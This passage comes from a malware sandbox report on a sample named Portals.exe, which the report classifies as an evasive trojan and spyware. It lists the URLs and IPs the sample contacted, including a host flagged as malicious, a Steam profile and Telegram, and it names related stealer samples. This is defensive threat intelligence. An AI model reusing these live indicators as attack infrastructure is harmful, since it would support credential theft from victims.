                                                                                                      https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 0000000D.00000002.1922744575.0000322C00CA0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922271085.0000322C00B0C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930185486.0000322C01450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 0000000D.00000002.1930155101.0000322C0141C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922074575.0000322C00A52000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922796680.0000322C00CB8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrlchrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpfalse
                                                                                                            		high
                                                                                                            https://116.202.4.22376561199829660832[1].htm.1.drfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            		unknown
                                                                                                            https://m.google.com/devicemanagement/data/apichrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 0000000D.00000002.1922744575.0000322C00CA0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922271085.0000322C00B0C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930185486.0000322C01450000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.google.com/recaptcha/Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://checkout.steampowered.com/Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://chromewebstore.google.com/chrome.exe, 0000000D.00000002.1918658950.0000322C001A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://clients4.google.com/chrome-syncchrome.exe, 0000000D.00000002.1918939961.0000322C00238000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://gemini.google.com/app?q=iekxl6.1.drfalse
                                                                                                                          		high
                                                                                                                          https://gemini.google.com/glic/intro?chrome.exe, 0000000D.00000002.1932925486.0000322C01C14000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://docs.google.com/presentation/Jchrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://help.steampowered.com/en/Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                                                                                		high
                                                                                                                                http://www.unicode.org/copyright.htmlchrome.exe, 0000000D.00000002.1904595328.00000262BEDB0000.00000002.00000001.00040000.00000012.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://drive.google.com/drive/installwebapp?usp=chrome_defaultchrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1920575603.0000322C006B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://chrome.google.com/webstoreLDDiscoverchrome.exe, 0000000D.00000002.1927038361.0000322C01198000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1927078497.0000322C011A8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1872766329.0000322C01604000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://recaptcha.net/recaptcha/;Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://docs.google.com/presentation/:chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&amp;l=enPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                                                                                            		high
                                                                                                                                            https://lens.google.com/gen204chrome.exe, 0000000D.00000003.1872712918.0000322C01520000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://b.b.goldenloafuae.comPortals.exe, 00000001.00000002.2197855678.00000000013A3000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2199005147.0000000003CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                              		unknown
                                                                                                                                              https://www.google.com/images/branding/product/ico/googleg_alldp.icoPortals.exe, 00000001.00000002.2199617855.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1919261632.0000322C0038C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1921038871.0000322C00834000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1920543191.0000322C006A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1929465013.0000322C013A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922304042.0000322C00B30000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1920509047.0000322C00690000.00000004.00001000.00020000.00000000.sdmp, iekxl6.1.drfalse
                                                                                                                                                		high
                                                                                                                                                https://broadcast.st.dl.eccdnx.comPortals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://mail.google.com/mail/?tab=rm&amp;ogblchrome.exe, 0000000D.00000002.1919562511.0000322C0046C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930277126.0000322C01494000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.google.com/chrome/privacy/eula_text.htmlH&elpManagedchrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://chromeenterprise.google/policies/#BrowserSwitcherUrlListchrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePWchrome.exe, 0000000D.00000002.1930155101.0000322C0141C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922074575.0000322C00A52000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922796680.0000322C00CB8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://policies.google.com/chrome.exe, 0000000D.00000002.1922617677.0000322C00C18000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmp, chrome.exe, 0000000D.00000003.1873296558.0000322C011B8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://apis.google.comchrome.exe, 0000000D.00000002.1932508840.0000322C01AAC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1932426735.0000322C01A68000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930277126.0000322C01494000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1932354357.0000322C01A2C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://steamcommunity.com/workshop/Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://login.steampowered.com/Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://support.mozilla.org/products/firefoxgro.allPortals.exe, 00000001.00000002.2202666222.00000000047C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://labs.google.com/search?source=ntpchrome.exe, 0000000D.00000002.1919562511.0000322C0046C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930277126.0000322C01494000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://store.steampowered.com/legal/Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://b.b.goldenloafuae.comKJPortals.exe, 00000001.00000002.2199005147.0000000003CE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://google-ohttp-relay-query.fastly-edge.com/2Pchrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://steamcommunity.com/profiles/76561199829660832ir7amMozilla/5.0Portals.exe, 00000001.00000002.2197435961.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://ogs.google.com/widget/app/so?eom=1chrome.exe, 0000000D.00000002.1932354357.0000322C01A2C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://chrome.google.com/webstore/category/extensionschrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgPortals.exe, 00000001.00000002.2199005147.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, ct26fk.1.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&aPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=englPortals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://www.google.com/searchchrome.exe, 0000000D.00000002.1932925486.0000322C01C14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://store.steampowered.com/76561199829660832[1].htm.1.drfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://support.google.com/chrome/a/?p=browser_profile_detailschrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpfalse
                                                                                                                                                                                                  		high

                                                                                                                                                                                                  World Map of Contacted IPs

                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                  Public IPs

                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                  116.202.4.223
                                                                                                                                                                                                  		unknownGermany
                                                                                                                                                                                                  		24940HETZNER-ASDEfalse
                                                                                                                                                                                                  149.154.167.99
                                                                                                                                                                                                  		t.meUnited Kingdom
                                                                                                                                                                                                  		62041TELEGRAMRUfalse
                                                                                                                                                                                                  23.197.127.21
                                                                                                                                                                                                  		steamcommunity.comUnited States
                                                                                                                                                                                                  		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                  142.250.186.132
                                                                                                                                                                                                  		unknownUnited States
                                                                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                                                                  94.130.189.58
                                                                                                                                                                                                  		b.b.goldenloafuae.comGermany
                                                                                                                                                                                                  		24940HETZNER-ASDEtrue

                                                                                                                                                                                                  Private

                                                                                                                                                                                                  IP
                                                                                                                                                                                                  192.168.2.4
                                                                                                                                                                                                  127.0.0.1

                                                                                                                                                                                                  General Information

                                                                                                                                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                  Analysis ID:1637568
                                                                                                                                                                                                  Start date and time:2025-03-13 18:00:58 +01:00
                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                  Overall analysis duration:0h 7m 23s
                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                  Run name:Run with higher sleep bypass
                                                                                                                                                                                                  Number of analysed new started processes analysed:22
                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                  Sample name:Portals.exe
                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@25/27@7/7
                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                  • Number of executed functions: 74
                                                                                                                                                                                                  • Number of non-executed functions: 42
                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                  • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                                                                                                                                  Warnings

                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.42.73.29, 142.250.186.174, 142.250.185.163, 142.250.186.46, 74.125.206.84, 216.58.206.78, 172.217.18.14, 142.250.185.67, 142.250.186.110, 20.190.159.0, 23.60.203.209, 4.245.163.56
                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, redirector.gvt1.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, umwatson.events.data.microsoft.com, clients.l.google.com, www.gstatic.com
                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                  No simulations

                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                  IPs

                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                  23.197.127.21http://steamcomunity.aiq.ru/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                  • steamcommunity.com/
                                                                                                                                                                                                  94.130.189.58ResPencil.5.6.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    149.154.167.99http://45.142.208.144.sslip.io/blog/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • telegram.org/img/emoji/40/F09F9889.png
                                                                                                                                                                                                    http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • telegram.org/img/favicon.ico
                                                                                                                                                                                                    http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                                    http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                    http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                                    http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                                    http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • telegram.org/?setln=pl
                                                                                                                                                                                                    http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • telegram.org/
                                                                                                                                                                                                    http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • telegram.dog/
                                                                                                                                                                                                    LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                    • t.me/cinoshibot

                                                                                                                                                                                                    Domains

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    t.mehttps://auth.microsites.m-atelier.cz/redir?url=https://telegra.ph/Charlotte-Reeves-03-13&data=05%7C02%7Cteat@test.com%7Cf85134ec55e24fa0741708dd623d50ea%7C22def1f7e945453d836bda7282c42443%7C0%7C0%7C638774737677482831%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsIlYiOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ==%7C0%7C%7C%7C&sdata=AFWlQKGCYsB3szoYr99UdtJsHEuv5b0KPmvHih+dvhk=&reserved=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    ngbtiladkrthgad.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    CheatInjector.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    SimpleLoader v2.1.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    http://khr.lfp.mybluehost.me/intesasanpaolo/web/login.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 50.6.3.255
                                                                                                                                                                                                    https://khr.lfp.mybluehost.me/intesasanpaolo/web/login.php/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 50.6.3.255
                                                                                                                                                                                                    Launcher.exeGet hashmaliciousLummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    Aura.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    M1gP5m86Gn.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    www.google.comhttps://ElFiMvMPo7PELB8XmSdaRZ8l4YCARPfCIqaQKOI9HeOnV5mpxI.moydow.de/4529491507/5163115035/#bnBkL29ibmZsanV0QXBpbWJ3c2JkZCUwbFN0ZDNHMHZzL25iZnlzdVRmdXpDL2RVVkZbZncxdXQ1WU50dTR0SGMyT1JbQnBjQ3oxemdYcnZYZldUOG5MRlRjezpuWW5IMDA7dHF1dWk=Get hashmaliciousInvisible JS, Tycoon2FABrowse
                                                                                                                                                                                                    • 142.250.185.196
                                                                                                                                                                                                    http://your@portal.investistratix.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.250.186.132
                                                                                                                                                                                                    https://links.box.com/s/c/juoqw4SedvwuOequ6M4ld_duh2_JtePeTMtNIPk_FgQMgpaCdemTi58H8yI3ylYW648uCy0Ouys_Ps17pQNqPKDeB52ufQpDOBZ-9GGsj9HqM5J2kr2I73zOXO5z9mDpHLPJmKhnwfFu6_faYBDQNisOl4mkuniuVn6ugfbs9oa1GKZbrVYNgPDcFovPaodhEPwgo66csoNifM6GdpVmondhpntyIL76pCrP4yTQ7Tp3aQ_vl_c2flkHy4XCw9Y8Xbo6SYJPBQ1etZojmut6Xue9HfF3eJ-m2dv0v0_HQ6G_ry8JdqaYTGLfAOdEAYLUliNDPPQDuEw65euSRj_uoHjgm3irwgwLlMZhz2KcAQ3zYzW2S4fjrfji7Yvpleqsn7s7IjNgGnuZrBN5zgFhAEcYQLdyeVNzPn7qTabZCIAewjRavAeq7F3hLgMtaS2jvrUU4FkAf2wpf-4sJBci4qMlV7CkUE0xnMW-jbxMox3NnDyDN035/asLmBR9yGyS8WO_rVlf3CjUDBUS31On6/7Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.250.185.196
                                                                                                                                                                                                    https://forms.monday.com/forms/67029d93936d7b64a3fbc15a7475ec8f?r=use1&c=E,1,THyo-S_P-0CHHa3uXfs0rZtMLjz4isIKq-YhZ2FY003H81dQx2Z7djFM4nGnHUOiGJjWoebTuzdCYhK-vDoAPt4JkzhGXkWP2d80wF2ep4EW&typo=1Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 142.250.186.68
                                                                                                                                                                                                    https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071aGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.250.185.68
                                                                                                                                                                                                    f40b7a79ed8433ee4d221f3553f422e9.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 216.58.206.68
                                                                                                                                                                                                    https://digimobil-recrgar.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.250.186.132
                                                                                                                                                                                                    https://nettl.ntfs2.shop/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.250.185.132
                                                                                                                                                                                                    http://cslearet.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.250.185.100
                                                                                                                                                                                                    https://ctrk.klclick3.com/l/01JP5VPSP6JS7E5VAEC1KGWEB7_2Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 142.250.185.132
                                                                                                                                                                                                    b.b.goldenloafuae.comResPencil.5.6.1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 94.130.189.58
                                                                                                                                                                                                    steamcommunity.comfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 104.73.234.102
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 104.73.234.102
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 104.73.234.102
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 104.73.234.102
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 104.73.234.102
                                                                                                                                                                                                    nvtoaldlrg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 104.73.234.102

                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    TELEGRAMRUfile.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                    https://auth.microsites.m-atelier.cz/redir?url=https://telegra.ph/Charlotte-Reeves-03-13&data=05%7C02%7Cteat@test.com%7Cf85134ec55e24fa0741708dd623d50ea%7C22def1f7e945453d836bda7282c42443%7C0%7C0%7C638774737677482831%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsIlYiOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ==%7C0%7C%7C%7C&sdata=AFWlQKGCYsB3szoYr99UdtJsHEuv5b0KPmvHih+dvhk=&reserved=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 149.154.164.13
                                                                                                                                                                                                    ngbtiladkrthgad.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    XClient.exe.bin.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                    Bank_Statement.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                    CheatInjector.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    NDQ211216GM08.exe.bin.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                    SimpleLoader v2.1.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                    • 149.154.167.220
                                                                                                                                                                                                    HETZNER-ASDEngbtiladkrthgad.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 78.47.63.132
                                                                                                                                                                                                    AAHiVVNIKQESryT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                    • 144.76.229.203
                                                                                                                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                    • 88.198.246.242
                                                                                                                                                                                                    uy2g7z.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 195.201.57.90
                                                                                                                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
